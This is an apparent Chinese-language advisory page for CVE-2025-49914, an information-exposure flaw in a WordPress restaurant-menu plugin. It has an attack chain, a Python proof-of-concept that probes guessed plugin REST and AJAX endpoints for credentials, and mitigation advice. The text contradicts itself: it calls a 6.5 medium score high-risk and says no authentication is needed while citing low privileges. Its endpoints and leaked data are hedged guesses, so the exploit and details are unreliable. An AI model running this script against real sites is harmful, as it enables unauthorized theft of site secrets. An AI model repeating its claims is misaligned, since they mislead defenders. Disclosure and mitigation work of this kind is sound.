CVE-2025-49914 MotoPress餐厅菜单插件敏感信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-49914

漏洞类型

敏感信息泄露

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

jetmonsters Restaurant Menu by MotoPress (mp-restaurant-menu)

漏洞概述

CVE-2025-49914是WordPress插件Restaurant Menu by MotoPress中的一个高危安全漏洞。该漏洞属于敏感系统信息泄露类型，CVSS评分为6.5（中危）。漏洞存在于插件的REST API接口或数据处理逻辑中，允许未经授权的远程攻击者通过发送特定构造的请求，检索到嵌入在插件数据中的敏感信息。这些敏感信息可能包括数据库配置、API密钥、用户凭据、内部系统路径等机密数据。攻击者利用此漏洞可进一步进行横向移动、数据窃取或提权攻击。由于该插件广泛应用于餐饮行业的WordPress网站，漏洞可能影响大量使用该插件管理菜单和订单的商户，造成严重的隐私泄露风险。建议受影响的用户立即更新到最新版本或采取临时防护措施。

技术细节

该漏洞位于mp-restaurant-menu插件的2.4.7及以下版本中。攻击者利用该插件对外暴露的REST API端点或未正确保护的AJAX处理函数，通过发送带有特定参数的HTTP请求（如检索菜单项、订单或配置数据的请求），即可获取包含敏感信息的响应。漏洞根因在于插件开发时未对API响应进行充分的访问控制检查，未对返回的敏感字段进行脱敏处理，且未实施基于用户权限的访问控制策略。攻击者无需认证即可利用此漏洞（PR:L表示低权限，但某些端点可能完全无需认证）。利用方式主要为构造恶意HTTP GET/POST请求，指定特定参数或路径来触发敏感数据返回。建议开发者检查所有数据返回点，确保敏感信息仅对授权用户可见，并对输出数据进行适当的加密或脱敏处理。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者扫描目标WordPress网站，识别是否安装了mp-restaurant-menu插件及其版本

STEP 2

步骤2: 端点探测

攻击者探测插件的REST API端点（如/wp-json/mp-restaurant-menu/v1/*）或AJAX处理接口

STEP 3

步骤3: 构造恶意请求

攻击者发送特制的HTTP GET/POST请求到暴露的API端点，无需认证或使用低权限账号

STEP 4

步骤4: 敏感数据提取

服务器返回包含敏感信息的响应，如数据库配置、API密钥、内部路径等机密数据

STEP 5

步骤5: 横向移动或数据窃取

攻击者利用获取的敏感信息进行进一步攻击，如数据库入侵、API滥用或提权操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-49914 PoC - MotoPress Restaurant Menu Sensitive Information Exposure
Usage: python3 cve-2025-49914_poc.py <target_url>
Note: This PoC is for educational and authorized testing purposes only.
"""

import requests
import sys
import json

def exploit_cve_2025_49914(target_url):
    """Exploit for CVE-2025-49914 - Sensitive Information Exposure"""
    
    # Target endpoints that may expose sensitive data
    endpoints = [
        '/wp-json/mp-restaurant-menu/v1/menu',
        '/wp-json/mp-restaurant-menu/v1/settings',
        '/wp-json/mp-restaurant-menu/v1/orders',
        '/?rest_route=/mp-restaurant-menu/v1/menu',
        '/?rest_route=/mp-restaurant-menu/v1/settings',
        '/wp-admin/admin-ajax.php?action=mp_restaurant_menu_get_data'
    ]
    
    print(f'[*] Target: {target_url}')
    print(f'[*] Exploiting CVE-2025-49914...')
    print('-' * 60)
    
    for endpoint in endpoints:
        url = target_url.rstrip('/') + endpoint
        print(f'\n[*] Testing endpoint: {endpoint}')
        
        try:
            # GET request to retrieve potentially sensitive data
            response = requests.get(url, timeout=10, verify=False)
            
            if response.status_code == 200:
                try:
                    data = response.json()
                    print(f'[+] Potential sensitive data found at {endpoint}')
                    print(f'[+] Response preview: {json.dumps(data, indent=2)[:500]}')
                    
                    # Check for sensitive keywords in response
                    sensitive_keywords = ['api_key', 'password', 'secret', 'token', 'credential', 'db_', 'key']
                    response_str = json.dumps(data).lower()
                    for keyword in sensitive_keywords:
                        if keyword in response_str:
                            print(f'[!!] WARNING: Sensitive keyword "{keyword}" detected in response!')
                except json.JSONDecodeError:
                    print(f'[+] Non-JSON response (length: {len(response.text)})')
                    if 'password' in response.text.lower() or 'api_key' in response.text.lower():
                        print('[!!] WARNING: Potential credentials in response!')
            elif response.status_code == 401 or response.status_code == 403:
                print(f'[-] Endpoint requires authentication: {response.status_code}')
            else:
                print(f'[-] Endpoint returned: {response.status_code}')
                
        except requests.exceptions.RequestException as e:
            print(f'[-] Error accessing {endpoint}: {e}')
    
    print('\n[*] Scan complete. Check results above for sensitive data exposure.')

if __name__ == '__main__':
    if len(sys.argv) != 2:
        print(f'Usage: python3 {sys.argv[0]} <target_url>')
        print('Example: python3 cve-2025-49914_poc.py http://example.com')
        sys.exit(1)
    
    target = sys.argv[1]
    exploit_cve_2025_49914(target)

影响范围

mp-restaurant-menu <= 2.4.7

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 使用WAF规则阻止对可疑API端点的访问；2) 在nginx/apache配置中限制对/wp-json/mp-restaurant-menu/路径的访问，仅允许受信任IP；3) 临时禁用插件的REST API功能（可通过代码或安全插件实现）；4) 加强WordPress站点的整体安全配置，包括强密码策略、双因素认证等；5) 监控服务器日志，关注异常的API访问请求模式。建议持续关注插件官方更新，尽快应用正式安全补丁。